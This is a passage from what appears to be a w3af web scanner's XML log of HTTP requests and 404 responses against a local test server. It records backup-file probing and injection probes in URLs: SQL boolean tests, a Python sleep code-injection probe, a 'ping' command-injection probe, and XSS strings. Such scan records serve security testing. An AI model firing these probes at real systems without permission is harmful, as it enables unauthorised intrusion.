                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="361">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.back HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="362">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.backup HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="363">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.old1 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="364">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.bkp HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="366">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="367">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="369">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.old HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="371">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="384">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/uqhjx%3C%2F-%3Euqhjx%2F%2Auqhjx%22uqhjxuqhjx%27uqhjxuqhjx%60uqhjxuqhjx+%3D HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="385">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/67%22+OR+%2267%22%3D%2267 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="394">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/N2iAcZWJ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="411">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/67%22+AND+%2267%22%3D%2268 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="418">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/__import__%28%27time%27%29.sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="572" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/__import__%28%27time%27%29.sleep%283%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="422">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="425">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/67%27+OR+%2767%27%3D%2767 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="433">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/67%27+AND+%2767%27%3D%2768 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="434">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/d%27z%220 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="435">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3C%21-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="447">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/67+OR+67%3D67+ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="468">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/67+AND+67%3D68+ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
